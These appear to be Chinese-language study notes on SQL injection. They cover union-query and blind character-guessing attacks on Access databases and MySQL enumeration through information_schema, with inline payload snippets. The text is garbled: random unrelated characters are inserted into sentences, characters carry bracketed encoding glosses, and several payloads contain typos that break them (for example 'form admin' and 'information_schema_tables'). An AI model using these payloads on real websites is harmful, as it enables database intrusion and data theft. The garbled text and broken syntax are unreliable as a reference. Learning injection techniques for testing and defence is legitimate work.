- 原理: 網(wǎng)站數(shù)據(jù)傳輸中贮配,接受變量傳遞的值未進(jìn)行過濾,導(dǎo)致直接帶入數(shù)據(jù)庫查詢執(zhí)行的操作問題塞赂。
- 必備條件:
1.變量接受
2.帶入數(shù)據(jù)庫查詢執(zhí)行
3.不存在過濾(可嘗試?yán)@過)
- Access注入
- 聯(lián)合查詢 :判斷注入(
order by 6)泪勒,猜解表名(union select 1,2,3 form admin),猜解列名宴猾,猜解數(shù)據(jù)
猜解不到的時候:1.字典文件收集 2.Access偏移注入 - 逐字猜解:
查表圆存,查列(and exists(select 列名 from 表名)),查數(shù)據(jù)(1. 確定長度 2. 確定ascll碼)
and(select top 1 len(列名)from admin)=5
and(select top 1 asc(mid(列名,位數(shù),1))from admin)=97
-
Mysql注入
mysql5.0以上自帶一個information_schema數(shù)據(jù)庫:存儲所有數(shù)據(jù)庫信息
數(shù)據(jù)庫名:database()
數(shù)據(jù)庫用戶:user()
數(shù)據(jù)庫版本:version()
操作系統(tǒng):@@version_compile_os
符號“.”:代表下一級
information_schema.tables:數(shù)據(jù)庫下tables表名仇哆,存儲所有數(shù)據(jù)庫下的表名信息的表
information_schema.columuns:存儲所有數(shù)據(jù)庫下的列名信息的表
Table_schema:數(shù)據(jù)庫名
Table_name:表名
Column_name:列名
查詢數(shù)據(jù)庫名test下的所有表名:union select tabale_name,2,3 from information_schema_tables where table_schema=test
